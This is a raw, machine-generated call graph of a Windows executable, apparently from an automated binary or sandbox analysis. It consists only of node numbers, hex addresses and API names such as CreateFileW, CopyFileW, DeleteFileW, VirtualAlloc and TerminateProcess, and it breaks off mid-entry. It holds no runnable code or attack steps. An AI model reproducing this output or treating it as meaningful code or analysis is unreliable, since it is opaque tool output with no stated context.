96835->96828 96835->96829 96835->96830 96835->96831 96835->96834 96836 c101f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent __Init_thread_footer 96835->96836 96835->96837 97088 c001e0 256 API calls 2 library calls 96835->97088 97089 c006a0 41 API calls messages 96835->97089 96836->96835 96837->96831 97090 c6359c 82 API calls __wsopen_s 96837->97090 96839 c67474 96838->96839 96840 c67469 96838->96840 96842 c67554 96839->96842 96845 bfa961 22 API calls 96839->96845 97149 bfb567 96840->97149 96843 c0fddb 22 API calls 96842->96843 96884 c676a4 96842->96884 96844 c67587 96843->96844 96846 c0fe0b 22 API calls 96844->96846 96847 c67495 96845->96847 96848 c67598 96846->96848 96849 bfa961 22 API calls 96847->96849 97094 bf6246 96848->97094 96850 c6749e 96849->96850 96852 bf7510 53 API calls 96850->96852 96854 c674aa 96852->96854 97154 bf525f 96854->97154 96858 c674bf 97196 bf6350 96858->97196 96859 bf6246 CloseHandle 96861 c675b2 96859->96861 97103 bf7510 96861->97103 96864 c6754a 96868 bfb567 39 API calls 96864->96868 96866 c5d4ce 4 API calls 96869 c67502 96866->96869 96867 bf6246 CloseHandle 96870 c675c8 96867->96870 96868->96842 96869->96864 96871 c67506 96869->96871 97126 bf5745 96870->97126 96873 bf9cb3 22 API calls 96871->96873 96875 c67513 96873->96875 97205 c5d2c1 26 API calls 96875->97205 96876 c676de GetLastError 96879 c676f7 96876->96879 96877 c675ea 97134 bf53de 96877->97134 97209 bf6216 CloseHandle messages 96879->97209 96882 c6751c 96882->96864 96883 c675f8 97206 bf53c7 SetFilePointerEx SetFilePointerEx SetFilePointerEx 96883->97206 96884->96768 96886 c675ff 96888 c67619 96886->96888 96889 c67645 96886->96889 96887 c0fddb 22 API calls 96890 c67679 96887->96890 97207 c5ccff SetFilePointerEx SetFilePointerEx SetFilePointerEx WriteFile 96888->97207 96889->96887 96892 bfa961 22 API calls 96890->96892 96893 c67686 96892->96893 96893->96884 97208 c5417d 22 API calls __fread_nolock 96893->97208 97299 c5dbbe lstrlenW 96895->97299 97304 c77f59 96898->97304 96900 c795af 96900->96768 96902 c77f59 120 API calls 96901->96902 96903 c7959b 96902->96903 96903->96768 96905 bfa961 22 API calls 96904->96905 96906 c66f1d 96905->96906 96907 bfa961 22 API calls 96906->96907 96908 c66f26 96907->96908 96909 c66f3a 96908->96909 96910 bfb567 39 API calls 96908->96910 96911 bf7510 53 API calls 96909->96911 96910->96909 96914 c66f57 _wcslen 96911->96914 96912 c670bf 97396 bf4ecb 96912->97396 96913 c66fbc 96915 bf7510 53 API calls 96913->96915 96914->96912 96914->96913 96983 c670e9 96914->96983 96917 c66fc8 96915->96917 96921 bfa8c7 22 API calls 96917->96921 96926 c66fdb 96917->96926 96919 c670e5 96920 bfa961 22 API calls 96919->96920 96919->96983 96923 c6711a 96920->96923 96921->96926 96922 bf4ecb 94 API calls 96922->96919 96924 bfa961 22 API calls 96923->96924 96928 c67126 96924->96928 96925 c67027 96927 bf7510 53 API calls 96925->96927 96926->96925 96929 c67005 96926->96929 96932 bfa8c7 22 API calls 96926->96932 96930 c67034 96927->96930 96931 bfa961 22 API calls 96928->96931 97527 bf33c6 96929->97527 96935 c67047 96930->96935 96936 c6703d 96930->96936 96937 c6712f 96931->96937 96932->96929 96934 c6700f 96938 bf7510 53 API calls 96934->96938 97536 c5e199 GetFileAttributesW 96935->97536 96939 bfa8c7 22 API calls 96936->96939 96941 bfa961 22 API calls 96937->96941 96942 c6701b 96938->96942 96939->96935 96944 c67138 96941->96944 96945 bf6350 22 API calls 96942->96945 96943 c67050 96946 c67063 96943->96946 96949 bf4c6d 22 API calls 96943->96949 96947 bf7510 53 API calls 96944->96947 96945->96925 96948 bf7510 53 API calls 96946->96948 96956 c67069 96946->96956 96950 c67145 96947->96950 96951 c670a0 96948->96951 96949->96946 96952 bf525f 22 API calls 96950->96952 97537 c5d076 57 API calls 96951->97537 96953 c67166 96952->96953 96955 bf4c6d 22 API calls 96953->96955 96957 c67175 96955->96957 96956->96983 96958 c671a9 96957->96958 96959 bf4c6d 22 API calls 96957->96959 96960 bfa8c7 22 API calls 96958->96960 96961 c67186 96959->96961 96962 c671ba 96960->96962 96961->96958 96964 bf6b57 22 API calls 96961->96964 96963 bf6350 22 API calls 96962->96963 96965 c671c8 96963->96965 96966 c6719b 96964->96966 96967 bf6350 22 API calls 96965->96967 96969 bf6b57 22 API calls 96966->96969 96968 c671d6 96967->96968 96970 bf6350 22 API calls 96968->96970 96969->96958 96971 c671e4 96970->96971 96972 bf7510 53 API calls 96971->96972 96973 c671f0 96972->96973 97418 c5d7bc 96973->97418 96975 c67201 96976 c5d4ce 4 API calls 96975->96976 96977 c6720b 96976->96977 96978 bf7510 53 API calls 96977->96978 96981 c67239 96977->96981 96979 c67229 96978->96979 97472 c62947 96979->97472 96982 bf4f39 68 API calls 96981->96982 96982->96983 96983->96768 98123 bf9c6e 96984->98123 96987 c0fddb 22 API calls 96989 c0f02b 96987->96989 96990 c0fe0b 22 API calls 96989->96990 96992 c0f03c 96990->96992 96991 c4f0a8 97032 c0f0a4 96991->97032 98161 c69caa 39 API calls 96991->98161 96993 bf6246 CloseHandle 96992->96993 96995 c0f047 96993->96995 96994 bfb567 39 API calls 96996 c4f10a 96994->96996 96997 bfa961 22 API calls 96995->96997 96998 c0f0b1 96996->96998 96999 c4f112 96996->96999 97000 c0f04f 96997->97000 97002 c0fa5b 3 API calls 96998->97002 97003 bfb567 39 API calls 96999->97003 97001 bf6246 CloseHandle 97000->97001 97004 c0f056 97001->97004 97008 c0f0b8 97002->97008 97003->97008 97005 bf7510 53 API calls 97004->97005 97006 c0f062 97005->97006 97007 bf6246 CloseHandle 97006->97007 97009 c0f06c 97007->97009 97010 c4f127 97008->97010 97011 c0f0d3 97008->97011 97012 bf5745 5 API calls 97009->97012 97014 c0fe0b 22 API calls 97010->97014 98137 bf6270 97011->98137 97015 c0f07d 97012->97015 97017 c4f12c 97014->97017 97018 c4f0a0 97015->97018 97023 c0f085 97015->97023 97025 c4f140 97017->97025 98162 c0f866 ReadFile SetFilePointerEx 97017->98162 98160 bf6216 CloseHandle messages 97018->98160 97026 bf53de 27 API calls 97023->97026 97024 c0f0ea 97029 c4f144 __fread_nolock 97024->97029 98157 bf62b5 22 API calls 97024->98157 97025->97029 98163 c60e85 22 API calls ___scrt_fastfail 97025->98163 97028 c0f093 97026->97028 98156 bf53c7 SetFilePointerEx SetFilePointerEx SetFilePointerEx 97028->98156 97031 c0f0fe 97033 c0f138 97031->97033 97036 bf6246 CloseHandle 97031->97036 97032->96994 97032->96998 97033->96768 97034 c0f09a 97034->97032 97035 c4f069 97034->97035 98159 c5ccff SetFilePointerEx SetFilePointerEx SetFilePointerEx WriteFile 97035->98159 97037 c0f12c 97036->97037 97037->97033 98158 bf6216 CloseHandle messages 97037->98158 97039 c4f080 97039->97032 97042 bf7510 53 API calls 97041->97042 97043 c6f126 97042->97043 98194 bf9e90 97043->98194 97045 c6f136 97046 c6f15b 97045->97046 97047 bfec40 256 API calls 97045->97047 97048 bf9c6e 22 API calls 97046->97048 97049 c6f15f 97046->97049 97047->97046 97048->97049 97049->96768 97051 bf4f4a 97050->97051 97052 bf4f43 97050->97052 97054 bf4f6a FreeLibrary 97051->97054 97055 bf4f59 97051->97055 97053 c1e678 67 API calls 97052->97053 97053->97051 97054->97055 97055->96768 97058 c0fddb 97056->97058 97057 c1ea0c ___std_exception_copy 21 API calls 97057->97058 97058->97057 97059 c0fdfa 97058->97059 97062 c0fdfc 97058->97062 98231 c14ead 7 API calls 2 library calls 97058->98231 97059->96744 97061 c1066d 98233 c132a4 RaiseException 97061->98233 97062->97061 98232 c132a4 RaiseException 97062->98232 97065 c1068a 97065->96744 97066->96767 97067->96729 97069 bf9cc2 _wcslen 97068->97069 97070 c0fe0b 22 API calls 97069->97070 97071 bf9cea __fread_nolock 97070->97071 97072 c0fddb 22 API calls 97071->97072 97073 bf9d00 97072->97073 97073->96743 97074->96733 97075->96742 97076->96752 97077->96752 97078->96731 97079->96768 97080->96768 97081->96768 97082->96762 97083->96768 97084->96809 97085->96810 97086->96808 97087->96813 97088->96835 97089->96835 97090->96831 97091->96831 97092->96834 97093->96831 97095 bf625f 97094->97095 97096 bf6250 97094->97096 97095->97096 97097 bf6264 CloseHandle 97095->97097 97098 bfa961 97096->97098 97097->97096 97099 c0fe0b 22 API calls 97098->97099 97100 bfa976 97099->97100 97101 c0fddb 22 API calls 97100->97101 97102 bfa984 97101->97102 97102->96859 97104 bf7525 97103->97104 97121 bf7522 97103->97121 97105 bf752d 97104->97105 97106 bf755b 97104->97106 97210 c151c6 26 API calls 97105->97210 97107 c350f6 97106->97107 97109 bf756d 97106->97109 97117 c3500f 97106->97117 97213 c15183 26 API calls 97107->97213 97211 c0fb21 51 API calls 97109->97211 97110 bf753d 97115 c0fddb 22 API calls 97110->97115 97113 c3510e 97113->97113 97118 bf7547 97115->97118 97116 c35088 97212 c0fb21 51 API calls 97116->97212 97117->97116 97120 c0fe0b 22 API calls 97117->97120 97119 bf9cb3 22 API calls 97118->97119 97119->97121 97122 c35058 97120->97122 97121->96867 97123 c0fddb 22 API calls 97122->97123 97124 c3507f 97123->97124 97125 bf9cb3 22 API calls 97124->97125 97125->97116 97127 bf575c CreateFileW 97126->97127 97128 c34035 97126->97128 97129 bf577b 97127->97129 97128->97129 97130 c3403b CreateFileW 97128->97130 97129->96876 97129->96877 97130->97129 97131 c34063 97130->97131 97214 bf54c6 97131->97214 97135 bf53f3 97134->97135 97148 bf53f0 messages 97134->97148 97136 bf54c6 3 API calls 97135->97136 97135->97148 97137 bf5410 97136->97137 97138 bf541d 97137->97138 97139 c33f4b 97137->97139 97141 c0fe0b 22 API calls 97138->97141 97229 c0fa5b 97139->97229 97142 bf5429 97141->97142 97220 bf5722 97142->97220 97147 bf54c6 3 API calls 97147->97148 97148->96883 97150 bfb57f 97149->97150 97151 bfb578 97149->97151 97150->96839 97151->97150 97235 c162d1 39 API calls 97151->97235 97153 bfb5c2 97153->96839 97155 bfa961 22 API calls 97154->97155 97156 bf5275 97155->97156 97157 bfa961 22 API calls 97156->97157 97158 bf527d 97157->97158 97159 bfa961 22 API calls 97158->97159 97160 bf5285 97159->97160 97161 bfa961 22 API calls 97160->97161 97162 bf528d 97161->97162 97163 c33df5 97162->97163 97164 bf52c1 97162->97164 97165 bfa8c7 22 API calls 97163->97165 97166 bf6d25 22 API calls 97164->97166 97167 c33dfe 97165->97167 97168 bf52cf 97166->97168 97256 bfa6c3 97167->97256 97249 bf93b2 97168->97249 97171 bf52d9 97172 bf5304 97171->97172 97173 bf6d25 22 API calls 97171->97173 97174 bf5349 97172->97174 97175 bf5325 97172->97175 97191 c33e20 97172->97191 97177 bf52fa 97173->97177 97236 bf6d25 97174->97236 97175->97174 97253 bf4c6d 97175->97253 97179 bf93b2 22 API calls 97177->97179 97178 bf535a 97180 bf5370 97178->97180 97185 bfa8c7 22 API calls 97178->97185 97179->97172 97182 bf5384 97180->97182 97188 bfa8c7 22 API calls 97180->97188 97186 bf538f 97182->97186 97189 bfa8c7 22 API calls 97182->97189 97185->97180 97190 bfa8c7 22 API calls 97186->97190 97194 bf539a 97186->97194 97187 bf6d25 22 API calls 97187->97174 97188->97182 97189->97186 97190->97194 97262 bf6b57 97191->97262 97192 bf4c6d 22 API calls 97193 c33ee0 97192->97193 97193->97174 97193->97192 97274 bf49bd 22 API calls __fread_nolock 97193->97274 97194->96858 97197 c34a51 97196->97197 97198 bf6362 97196->97198 97293 bf4a88 22 API calls __fread_nolock 97197->97293 97283 bf6373 97198->97283 97201 bf636e 97201->96864 97201->96866 97202 c34a5b 97203 c34a67 97202->97203 97204 bfa8c7 22 API calls 97202->97204 97204->97203 97205->96882 97206->96886 97207->96889 97208->96884 97209->96884 97210->97110 97211->97110 97212->97107 97213->97113 97215 bf54dd 97214->97215 97216 bf5564 SetFilePointerEx SetFilePointerEx 97215->97216 97217 c33f9c SetFilePointerEx 97215->97217 97218 c33f8b 97215->97218 97219 bf5530 97215->97219 97216->97219 97218->97217 97219->97129 97221 c0fddb 22 API calls 97220->97221 97222 bf5433 97221->97222 97223 bf9a40 97222->97223 97224 bf9abb 97223->97224 97227 bf9a4e 97223->97227 97234 c0e40f SetFilePointerEx 97224->97234 97226 bf543f 97226->97147 97227->97226 97228 bf9a8c ReadFile 97227->97228 97228->97226 97228->97227 97230 bf54c6 3 API calls 97229->97230 97231 c0fa79 97230->97231 97232 bf54c6 3 API calls 97231->97232 97233 c0fa9a 97232->97233 97233->97148 97234->97227 97235->97153 97237 bf6d34 97236->97237 97238 bf6d91 97236->97238 97237->97238 97240 bf6d3f 97237->97240 97239 bf93b2 22 API calls 97238->97239 97246 bf6d62 __fread_nolock 97239->97246 97241 bf6d5a 97240->97241 97242 c34c9d 97240->97242 97275 bf6f34 22 API calls 97241->97275 97243 c0fddb 22 API calls 97242->97243 97245 c34ca7 97243->97245 97247 c0fe0b 22 API calls 97245->97247 97246->97178 97248 c34cda 97247->97248 97250 bf93c9 __fread_nolock 97249->97250 97251 bf93c0 97249->97251 97250->97171 97251->97250 97276 bfaec9 97251->97276 97254 bfaec9 22 API calls 97253->97254 97255 bf4c78 97254->97255 97255->97174 97255->97187 97257 bfa6dd 97256->97257 97261 bfa6d0 97256->97261 97258 c0fddb 22 API calls 97257->97258 97259 bfa6e7 97258->97259 97260 c0fe0b 22 API calls 97259->97260 97260->97261 97261->97172 97263 c34ba1 97262->97263 97264 bf6b67 _wcslen 97262->97264 97265 bf93b2 22 API calls 97263->97265 97267 bf6b7d 97264->97267 97268 bf6ba2 97264->97268 97266 c34baa 97265->97266 97266->97266 97282 bf6f34 22 API calls 97267->97282 97270 c0fddb 22 API calls 97268->97270 97272 bf6bae 97270->97272 97271 bf6b85 __fread_nolock 97271->97193 97273 c0fe0b 22 API calls 97272->97273 97273->97271 97274->97193 97275->97246 97277 bfaedc 97276->97277 97281 bfaed9 __fread_nolock 97276->97281 97278 c0fddb 22 API calls 97277->97278 97279 bfaee7 97278->97279 97280 c0fe0b 22 API calls 97279->97280 97280->97281 97281->97250 97282->97271 97285 bf6382 97283->97285 97290 bf63b6 __fread_nolock 97283->97290 97284 c34a82 97287 c0fddb 22 API calls 97284->97287 97285->97284 97286 bf63a9 97285->97286 97285->97290 97294 bfa587 97286->97294 97289 c34a91 97287->97289 97291 c0fe0b 22 API calls 97289->97291 97290->97201 97292 c34ac5 __fread_nolock 97291->97292 97293->97202 97295 bfa59d 97294->97295 97298 bfa598 __fread_nolock 97294->97298 97296 c0fe0b 22 API calls 97295->97296 97297 c3f80f 97295->97297 97296->97298 97297->97297 97298->97290 97300 c5dbdc GetFileAttributesW 97299->97300 97301 c5d4d5 97299->97301 97300->97301 97302 c5dbe8 FindFirstFileW 97300->97302 97301->96768 97302->97301 97303 c5dbf9 FindClose 97302->97303 97303->97301 97305 bf7510 53 API calls 97304->97305 97306 c77f90 97305->97306 97329 c77fd5 messages 97306->97329 97342 c78cd3 97306->97342 97308 c78281 97309 c7844f 97308->97309 97313 c7828f 97308->97313 97383 c78ee4 60 API calls 97309->97383 97312 c7845e 97312->97313 97314 c7846a 97312->97314 97355 c77e86 97313->97355 97314->97329 97315 bf7510 53 API calls 97332 c78049 97315->97332 97320 c782c8 97370 c0fc70 97320->97370 97323 c78302 97377 bf63eb 22 API calls 97323->97377 97324 c782e8 97376 c6359c 82 API calls __wsopen_s 97324->97376 97327 c782f3 GetCurrentProcess TerminateProcess 97327->97323 97328 c78311 97378 bf6a50 22 API calls 97328->97378 97329->96900 97331 c7832a 97340 c78352 97331->97340 97379 c004f0 22 API calls 97331->97379 97332->97308 97332->97315 97332->97329 97374 c5417d 22 API calls __fread_nolock 97332->97374 97375 c7851d 42 API calls 97332->97375 97333 c784c5 97333->97329 97337 c784d9 FreeLibrary 97333->97337 97335 c78341 97380 c78b7b 75 API calls 97335->97380 97337->97329 97340->97333 97381 c004f0 22 API calls 97340->97381 97382 bfaceb 23 API calls messages 97340->97382 97384 c78b7b 75 API calls 97340->97384 97343 bfaec9 22 API calls 97342->97343 97344 c78cee CharLowerBuffW 97343->97344 97385 c58e54 97344->97385 97348 bfa961 22 API calls 97349 c78d2a 97348->97349 97350 bf6d25 22 API calls 97349->97350 97351 c78d3e 97350->97351 97352 bf93b2 22 API calls 97351->97352 97354 c78d48 _wcslen 97352->97354 97353 c78e5e _wcslen 97353->97332 97354->97353 97392 c7851d 42 API calls 97354->97392 97356 c77ea1 97355->97356 97357 c77eec 97355->97357 97358 c0fe0b 22 API calls 97356->97358 97361 c79096 97357->97361 97359 c77ec3 97358->97359 97359->97357 97360 c0fddb 22 API calls 97359->97360 97360->97359 97362 c792ab messages 97361->97362 97369 c790ba _strcat _wcslen 97361->97369 97362->97320 97363 bfb567 39 API calls 97363->97369 97364 bfb38f 39 API calls 97364->97369 97365 bfb6b5 39 API calls 97365->97369 97366 bf7510 53 API calls 97366->97369 97367 c1ea0c 21 API calls ___std_exception_copy 97367->97369 97369->97362 97369->97363 97369->97364 97369->97365 97369->97366 97369->97367 97395 c5efae 24 API calls _wcslen 97369->97395 97371 c0fc85 97370->97371 97372 c0fd1d VirtualAlloc 97371->97372 97373 c0fceb 97371->97373 97372->97373 97373->97323 97373->97324 97374->97332 97375->97332 97376->97327 97377->97328 97378->97331 97379->97335 97380->97340 97381->97340 97382->97340 97383->97312 97384->97340 97386 c58e74 _wcslen 97385->97386 97387 c58f63 97386->97387 97388 c58ea9 97386->97388 97391 c58f68 97386->97391 97387->97348 97387->97354 97388->97387 97393 c0ce60 41 API calls 97388->97393 97391->97387 97394 c0ce60 41 API calls 97391->97394 97392->97353 97393->97388 97394->97391 97395->97369 97538 bf4e90 LoadLibraryA 97396->97538 97401 bf4ef6 LoadLibraryExW 97546 bf4e59 LoadLibraryA 97401->97546 97402 c33ccf 97404 bf4f39 68 API calls 97402->97404 97406 c33cd6 97404->97406 97408 bf4e59 3 API calls 97406->97408 97410 c33cde 97408->97410 97409 bf4f20 97409->97410 97411 bf4f2c 97409->97411 97568 bf50f5 97410->97568 97412 bf4f39 68 API calls 97411->97412 97415 bf4f31 97412->97415 97415->96919 97415->96922 97417 c33d05 97419 c5d7d8 97418->97419 97420 c5d7f3 97419->97420 97421 c5d7dd 97419->97421 97422 bfa961 22 API calls 97420->97422 97423 bfa8c7 22 API calls 97421->97423 97471 c5d7ee 97421->97471 97424 c5d7fb 97422->97424 97423->97471 97425 bfa961 22 API calls 97424->97425 97426 c5d803 97425->97426 97427 bfa961 22 API calls 97426->97427 97428 c5d80e 97427->97428 97429 bfa961 22 API calls 97428->97429 97430 c5d816 97429->97430 97431 bfa961 22 API calls 97430->97431 97432 c5d81e 97431->97432 97433 bfa961 22 API calls 97432->97433 97434 c5d826 97433->97434 97435 bfa961 22 API calls 97434->97435 97436 c5d82e 97435->97436 97437 bfa961 22 API calls 97436->97437 97438 c5d836 97437->97438 97439 bf525f 22 API calls 97438->97439 97440 c5d84d 97439->97440 97441 bf525f 22 API calls 97440->97441 97442 c5d866 97441->97442 97443 bf4c6d 22 API calls 97442->97443 97444 c5d872 97443->97444 97445 c5d885 97444->97445 97447 bf93b2 22 API calls 97444->97447 97446 bf4c6d 22 API calls 97445->97446 97448 c5d88e 97446->97448 97447->97445 97449 c5d89e 97448->97449 97450 bf93b2 22 API calls 97448->97450 97451 c5d8b0 97449->97451 97452 bfa8c7 22 API calls 97449->97452 97450->97449 97453 bf6350 22 API calls 97451->97453 97452->97451 97454 c5d8bb 97453->97454 97801 c5d978 22 API calls 97454->97801 97456 c5d8ca 97802 c5d978 22 API calls 97456->97802 97458 c5d8dd 97459 bf4c6d 22 API calls 97458->97459 97460 c5d8e7 97459->97460 97461 c5d8ec 97460->97461 97462 c5d8fe 97460->97462 97463 bf33c6 22 API calls 97461->97463 97464 bf4c6d 22 API calls 97462->97464 97465 c5d8f9 97463->97465 97466 c5d907 97464->97466 97469 bf6350 22 API calls 97465->97469 97467 c5d925 97466->97467 97468 bf33c6 22 API calls 97466->97468 97470 bf6350 22 API calls 97467->97470 97468->97465 97469->97467 97470->97471 97471->96975 97473 c62954 __wsopen_s 97472->97473 97474 c0fe0b 22 API calls 97473->97474 97475 c62971 97474->97475 97476 bf5722 22 API calls 97475->97476 97477 c6297b 97476->97477 97803 c6274e 97477->97803 97479 c62986 97480 bf511f 64 API calls 97479->97480 97481 c6299b 97480->97481 97482 c629bf 97481->97482 97483 c62a6c 97481->97483 97832 c62e66 75 API calls 97482->97832 97835 c62e66 75 API calls 97483->97835 97486 c629c4 97521 c62a75 messages 97486->97521 97833 c1d583 26 API calls 97486->97833 97487 c62a38 97489 bf50f5 40 API calls 97487->97489 97487->97521 97490 c62a91 97489->97490 97491 bf50f5 40 API calls 97490->97491 97493 c62aa1 97491->97493 97492 c629ed 97834 c1d583 26 API calls 97492->97834 97494 bf50f5 40 API calls 97493->97494 97496 c62abc 97494->97496 97497 bf50f5 40 API calls 97496->97497 97498 c62acc 97497->97498 97499 bf50f5 40 API calls 97498->97499 97500 c62ae7 97499->97500 97501 bf50f5 40 API calls 97500->97501 97502 c62af7 97501->97502 97503 bf50f5 40 API calls 97502->97503 97504 c62b07 97503->97504 97505 bf50f5 40 API calls 97504->97505 97506 c62b17 97505->97506 97806 c63017 GetTempPathW GetTempFileNameW 97506->97806 97508 c62b22 97509 c1e5eb 29 API calls 97508->97509 97520 c62b33 97509->97520 97510 c62bed 97816 c1e678 97510->97816 97512 c62bf8 97514 c62c12 97512->97514 97515 c62bfe DeleteFileW 97512->97515 97513 bf50f5 40 API calls 97513->97520 97516 c62c91 CopyFileW 97514->97516 97523 c62c18 97514->97523 97515->97521 97517 c62ca7 DeleteFileW 97516->97517 97518 c62cb9 DeleteFileW 97516->97518 97517->97521 97829 c62fd8 CreateFileW 97518->97829 97520->97510 97520->97513 97520->97521 97807 c1dbb3 97520->97807 97521->96981 97836 c622ce 97523->97836 97528 bf33dd 97527->97528 97529 c330bb 97527->97529 98113 bf33ee 97528->98113 97530 c0fddb 22 API calls 97529->97530 97533 c330c5 _wcslen 97530->97533 97532 bf33e8 97532->96934 97534 c0fe0b 22 API calls 97533->97534 97535 c330fe __fread_nolock 97534->97535 97536->96943 97537->96956 97539 bf4ea8 GetProcAddress 97538->97539 97540 bf4ec6 97538->97540 97541 bf4eb8 97539->97541 97543 c1e5eb 97540->97543 97541->97540 97542 bf4ebf FreeLibrary 97541->97542 97542->97540 97574 c1e52a 97543->97574 97545 bf4eea 97545->97401 97545->97402 97547 bf4e6e GetProcAddress 97546->97547 97548 bf4e8d 97546->97548 97549 bf4e7e 97547->97549 97551 bf4f80 97548->97551 97549->97548 97550 bf4e86 FreeLibrary 97549->97550 97550->97548 97552 c0fe0b 22 API calls 97551->97552 97553 bf4f95 97552->97553 97554 bf5722 22 API calls 97553->97554 97555 bf4fa1 __fread_nolock 97554->97555 97556 bf50a5 97555->97556 97557 c33d1d 97555->97557 97567 bf4fdc 97555->97567 97626 bf42a2 CreateStreamOnHGlobal 97556->97626 97637 c6304d 74 API calls 97557->97637 97560 c33d22 97562 bf511f 64 API calls 97560->97562 97561 bf50f5 40 API calls 97561->97567 97563 c33d45 97562->97563 97564 bf50f5 40 API calls 97563->97564 97566 bf506e messages 97564->97566 97566->97409 97567->97560 97567->97561 97567->97566 97632 bf511f 97567->97632 97569 c33d70 97568->97569 97570 bf5107 97568->97570 97659 c1e8c4 97570->97659 97573 c628fe 27 API calls 97573->97417 97576 c1e536 BuildCatchObjectHelperInternal 97574->97576 97575 c1e544 97599 c1f2d9 20 API calls _abort 97575->97599 97576->97575 97578 c1e574 97576->97578 97581 c1e586 97578->97581 97582 c1e579 97578->97582 97579 c1e549 97600 c227ec 26 API calls pre_c_initialization 97579->97600 97591 c28061 97581->97591 97601 c1f2d9 20 API calls _abort 97582->97601 97585 c1e58f 97586 c1e595 97585->97586 97589 c1e5a2 97585->97589 97602 c1f2d9 20 API calls _abort 97586->97602 97587 c1e554 __wsopen_s 97587->97545 97603 c1e5d4 LeaveCriticalSection __fread_nolock 97589->97603 97592 c2806d BuildCatchObjectHelperInternal 97591->97592 97604 c22f5e EnterCriticalSection 97592->97604 97594 c2807b 97605 c280fb 97594->97605 97598 c280ac __wsopen_s 97598->97585 97599->97579 97600->97587 97601->97587 97602->97587 97603->97587 97604->97594 97612 c2811e 97605->97612 97606 c28177 97607 c24c7d _abort 20 API calls 97606->97607 97608 c28180 97607->97608 97610 c229c8 _free 20 API calls 97608->97610 97611 c28189 97610->97611 97617 c28088 97611->97617 97623 c23405 11 API calls 2 library calls 97611->97623 97612->97606 97612->97612 97612->97617 97621 c1918d EnterCriticalSection 97612->97621 97622 c191a1 LeaveCriticalSection 97612->97622 97614 c281a8 97624 c1918d EnterCriticalSection 97614->97624 97618 c280b7 97617->97618 97625 c22fa6 LeaveCriticalSection 97618->97625 97620 c280be 97620->97598 97621->97612 97622->97612 97623->97614 97624->97617 97625->97620 97627 bf42bc FindResourceExW 97626->97627 97631 bf42d9 97626->97631 97628 c335ba LoadResource 97627->97628 97627->97631 97629 c335cf SizeofResource 97628->97629 97628->97631 97630 c335e3 LockResource 97629->97630 97629->97631 97630->97631 97631->97567 97633 bf512e 97632->97633 97634 c33d90 97632->97634 97638 c1ece3 97633->97638 97637->97560 97641 c1eaaa 97638->97641 97640 bf513c 97640->97567 97645 c1eab6 BuildCatchObjectHelperInternal 97641->97645 97642 c1eac2 97654 c1f2d9 20 API calls _abort 97642->97654 97644 c1eae8 97656 c1918d EnterCriticalSection 97644->97656 97645->97642 97645->97644 97646 c1eac7 97655 c227ec 26 API calls pre_c_initialization 97646->97655 97649 c1eaf4 97657 c1ec0a 62 API calls 2 library calls 97649->97657 97651 c1eb08 97658 c1eb27 LeaveCriticalSection __fread_nolock 97651->97658 97653 c1ead2 __wsopen_s 97653->97640 97654->97646 97655->97653 97656->97649 97657->97651 97658->97653 97662 c1e8e1 97659->97662 97661 bf5118 97661->97573 97663 c1e8ed BuildCatchObjectHelperInternal 97662->97663 97664 c1e92d 97663->97664 97665 c1e925 __wsopen_s 97663->97665 97670 c1e900 ___scrt_fastfail 97663->97670 97675 c1918d EnterCriticalSection 97664->97675 97665->97661 97667 c1e937 97676 c1e6f8 97667->97676 97689 c1f2d9 20 API calls _abort 97670->97689 97671 c1e91a 97690 c227ec 26 API calls pre_c_initialization 97671->97690 97675->97667 97677 c1e727 97676->97677 97680 c1e70a ___scrt_fastfail 97676->97680 97691 c1e96c LeaveCriticalSection __fread_nolock 97677->97691 97678 c1e717 97764 c1f2d9 20 API calls _abort 97678->97764 97680->97677 97680->97678 97682 c1e76a __fread_nolock 97680->97682 97682->97677 97685 c1e886 ___scrt_fastfail 97682->97685 97692 c1d955 97682->97692 97699 c28d45 97682->97699 97766 c1cf78 26 API calls 4 library calls 97682->97766 97767 c1f2d9 20 API calls _abort 97685->97767 97687 c1e71c 97765 c227ec 26 API calls pre_c_initialization 97687->97765 97689->97671 97690->97665 97691->97665 97693 c1d961 97692->97693 97694 c1d976 97692->97694 97768 c1f2d9 20 API calls _abort 97693->97768 97694->97682 97696 c1d966 97769 c227ec 26 API calls pre_c_initialization 97696->97769 97698 c1d971 97698->97682 97700 c28d57 97699->97700 97701 c28d6f 97699->97701 97779 c1f2c6 20 API calls _abort 97700->97779 97703 c290d9 97701->97703 97712 c28db4 97701->97712 97795 c1f2c6 20 API calls _abort 97703->97795 97704 c28d5c 97780 c1f2d9 20 API calls _abort 97704->97780 97707 c290de 97796 c1f2d9 20 API calls _abort 97707->97796 97708 c28dbf 97781 c1f2c6 20 API calls _abort 97708->97781 97709 c28d64 97709->97682 97712->97708 97712->97709 97717 c28def 97712->97717 97713 c28dcc 97797 c227ec 26 API calls pre_c_initialization 97713->97797 97714 c28dc4 97782 c1f2d9 20 API calls _abort 97714->97782 97718 c28e08 97717->97718 97719 c28e4a 97717->97719 97720 c28e2e 97717->97720 97718->97720 97726 c28e15 97718->97726 97786 c23820 21 API calls 2 library calls 97719->97786 97783 c1f2c6 20 API calls _abort 97720->97783 97722 c28e33 97784 c1f2d9 20 API calls _abort 97722->97784 97770 c2f89b 97726->97770 97727 c28e61 97730 c229c8 _free 20 API calls 97727->97730 97728 c28e3a 97785 c227ec 26 API calls pre_c_initialization 97728->97785 97729 c28fb3 97732 c29029 97729->97732 97735 c28fcc GetConsoleMode 97729->97735 97733 c28e6a 97730->97733 97734 c2902d ReadFile 97732->97734 97736 c229c8 _free 20 API calls 97733->97736 97737 c290a1 GetLastError 97734->97737 97738 c29047 97734->97738 97735->97732 97739 c28fdd 97735->97739 97740 c28e71 97736->97740 97741 c29005 97737->97741 97742 c290ae 97737->97742 97738->97737 97743 c2901e 97738->97743 97739->97734 97744 c28fe3 ReadConsoleW 97739->97744 97745 c28e96 97740->97745 97746 c28e7b 97740->97746 97762 c28e45 __fread_nolock 97741->97762 97790 c1f2a3 20 API calls 2 library calls 97741->97790 97793 c1f2d9 20 API calls _abort 97742->97793 97757 c29083 97743->97757 97758 c2906c 97743->97758 97743->97762 97744->97743 97750 c28fff GetLastError 97744->97750 97789 c29424 28 API calls __wsopen_s 97745->97789 97787 c1f2d9 20 API calls _abort 97746->97787 97750->97741 97751 c229c8 _free 20 API calls 97751->97709 97752 c28e80 97788 c1f2c6 20 API calls _abort 97752->97788 97753 c290b3 97794 c1f2c6 20 API calls _abort 97753->97794 97760 c2909a 97757->97760 97757->97762 97791 c28a61 31 API calls 4 library calls 97758->97791 97792 c288a1 29 API calls __wsopen_s 97760->97792 97762->97751 97763 c2909f 97763->97762 97764->97687 97765->97677 97766->97682 97767->97687 97768->97696 97769->97698 97771 